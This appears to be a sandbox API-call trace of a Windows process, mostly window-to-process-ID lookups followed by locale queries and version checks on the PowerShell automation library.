	[0506.148] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x6f8
	[0506.148] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x358
	[0506.149] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x73c
	[0506.149] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xb0
	[0506.149] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x250
	[0506.149] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x240
	[0506.149] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x790
	[0506.149] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x61c
	[0506.149] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x540
	[0506.149] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x538
	[0506.149] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x568
	[0506.149] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x538
	[0506.149] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x568
	[0506.149] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x538
	[0506.149] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x540
	[0506.150] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x540
	[0506.150] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x57c
	[0506.150] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x460
	[0506.150] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x554
	[0506.150] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.150] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x528
	[0506.150] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.150] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.150] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.150] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x79c
	[0506.150] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.150] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4e0
	[0506.150] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.150] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x460
	[0506.151] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x460
	[0506.151] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x44c
	[0506.151] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x778
	[0506.151] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x460
	[0506.151] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x558
	[0506.151] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.151] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.151] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x10c4
	[0506.151] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x128c
	[0506.151] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x16e8
	[0506.151] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x16cc
	[0506.151] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x274
	[0506.151] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x10e0
	[0506.152] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x10cc
	[0506.152] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x10c0
	[0506.152] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x10d0
	[0506.152] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1198
	[0506.152] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1080
	[0506.152] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1074
	[0506.152] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x106c
	[0506.152] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1474
	[0506.152] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1414
	[0506.152] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xbd0
	[0506.152] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x550
	[0506.152] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xa38
	[0506.152] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x16d0
	[0506.153] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x16d4
	[0506.153] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x15bc
	[0506.153] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x15a0
	[0506.153] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x159c
	[0506.153] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1598
	[0506.153] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1594
	[0506.153] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1590
	[0506.153] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x158c
	[0506.153] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1588
	[0506.153] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1584
	[0506.154] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1580
	[0506.154] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x157c
	[0506.154] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1488
	[0506.154] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1404
	[0506.154] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x11b8
	[0506.154] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xbd4
	[0506.154] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xe0c
	[0506.154] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xd30
	[0506.154] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xe70
	[0506.154] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x13b8
	[0506.154] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xe20
	[0506.154] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xe2c
	[0506.154] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xe00
	[0506.154] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xe04
	[0506.155] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xc94
	[0506.155] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x13b0
	[0506.155] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x13ac
	[0506.155] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x13a8
	[0506.155] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1374
	[0506.155] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x132c
	[0506.155] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1328
	[0506.155] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x12d0
	[0506.155] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x12cc
	[0506.155] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x12c8
	[0506.155] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1290
	[0506.155] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1218
	[0506.155] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1214
	[0506.156] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x11ec
	[0506.156] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x11e8
	[0506.156] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x11cc
	[0506.156] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1140
	[0506.156] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xe6c
	[0506.156] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x6e8
	[0506.156] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xc6c
	[0506.156] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xf94
	[0506.156] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xffc
	[0506.156] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xf74
	[0506.156] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xf08
	[0506.156] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xf0c
	[0506.156] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xed8
	[0506.157] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xe90
	[0506.157] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xea8
	[0506.157] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xfa8
	[0506.157] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xfbc
	[0506.157] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xfb8
	[0506.157] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xfb4
	[0506.157] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xfb0
	[0506.157] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xfac
	[0506.157] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xfc0
	[0506.157] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xfd0
	[0506.157] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xf88
	[0506.157] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xf84
	[0506.157] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xf80
	[0506.157] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xde0
	[0506.158] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xddc
	[0506.158] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xdd8
	[0506.158] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xd34
	[0506.158] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xd10
	[0506.158] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xd0c
	[0506.158] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xc9c
	[0506.158] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xc74
	[0506.158] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xc1c
	[0506.158] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xc08
	[0506.158] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xabc
	[0506.158] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x24c
	[0506.159] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xbb0
	[0506.159] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xbfc
	[0506.159] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xb10
	[0506.159] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x374
	[0506.159] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x368
	[0506.159] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xb28
	[0506.159] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xae8
	[0506.159] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xb14
	[0506.159] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x95c
	[0506.159] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xa8c
	[0506.159] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x46c
	[0506.159] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xb3c
	[0506.160] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xa90
	[0506.160] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xad0
	[0506.160] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xa9c
	[0506.160] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xaa0
	[0506.160] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xb1c
	[0506.160] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x7e0
	[0506.160] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xa74
	[0506.160] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x694
	[0506.160] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xa28
	[0506.160] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x9b0
	[0506.160] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x8d8
	[0506.161] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x940
	[0506.161] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x93c
	[0506.161] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4ec
	[0506.161] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x150
	[0506.161] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x720
	[0506.167] WerSetFlags () returned 0x0
	[0506.854] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0506.854] CoTaskMemFree (pv=0x0) 
	[0506.855] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x22dc88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x22dc80 | out: pulNumLanguages=0x22dc88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x22dc80) returned 1
	[0506.855] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x22dc88, pwszLanguagesBuffer=0x2b168b8, pcchLanguagesBuffer=0x22dc80 | out: pulNumLanguages=0x22dc88, pwszLanguagesBuffer=0x2b168b8, pcchLanguagesBuffer=0x22dc80) returned 1
	[0506.860] CoTaskMemAlloc (cb=0x24) returned 0x3bb8f0
	[0506.860] GetUserDefaultLocaleName (in: lpLocaleName=0x3bb8f0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0506.861] CoTaskMemFree (pv=0x3bb8f0) 
	[0506.923] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0506.923] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0506.924] CoTaskMemFree (pv=0x38e630) 
	[0507.457] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0507.457] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.457] CoTaskMemFree (pv=0x38e630) 
	[0507.460] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0507.460] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.460] CoTaskMemFree (pv=0x38e630) 
	[0507.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0507.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0507.474] SetErrorMode (uMode=0x1) returned 0x1
	[0507.474] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x22d900 | out: lpFileInformation=0x22d900*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0507.475] SetErrorMode (uMode=0x1) returned 0x1
	[0507.475] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x22db70 | out: lpdwHandle=0x22db70) returned 0x94c
	[0507.476] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b1a148 | out: lpData=0x2b1a148) returned 1
	[0507.477] VerQueryValueW (in: pBlock=0x2b1a148, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22dae8, puLen=0x22dae0 | out: lplpBuffer=0x22dae8*=0x2b1a1e4, puLen=0x22dae0) returned 1
	[0507.477] VerQueryValueW (in: pBlock=0x2b1a148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x22da58, puLen=0x22da50 | out: lplpBuffer=0x22da58*=0x2b1a2c0, puLen=0x22da50) returned 1
	[0507.477] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0507.477] CoTaskMemAlloc (cb=0x2e) returned 0x365520
	[0507.477] lstrcpyW (in: lpString1=0x365520, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0507.477] CoTaskMemFree (pv=0x365520) 
	[0507.478] VerQueryValueW (in: pBlock=0x2b1a148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x22da58, puLen=0x22da50 | out: lplpBuffer=0x22da58*=0x2b1a314, puLen=0x22da50) returned 1
	[0507.478] lstrlenW (lpString="System.Management.Automation") returned 28
	[0507.478] CoTaskMemAlloc (cb=0x3c) returned 0x3c4550
	[0507.478] lstrcpyW (in: lpString1=0x3c4550, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0507.478] CoTaskMemFree (pv=0x3c4550) 
	[0507.478] VerQueryValueW (in: pBlock=0x2b1a148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x22da58, puLen=0x22da50 | out: lplpBuffer=0x22da58*=0x2b1a370, puLen=0x22da50) returned 1
	[0507.478] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0507.478] CoTaskMemAlloc (cb=0x20) returned 0x3541c0
	[0507.478] lstrcpyW (in: lpString1=0x3541c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0507.478] CoTaskMemFree (pv=0x3541c0) 
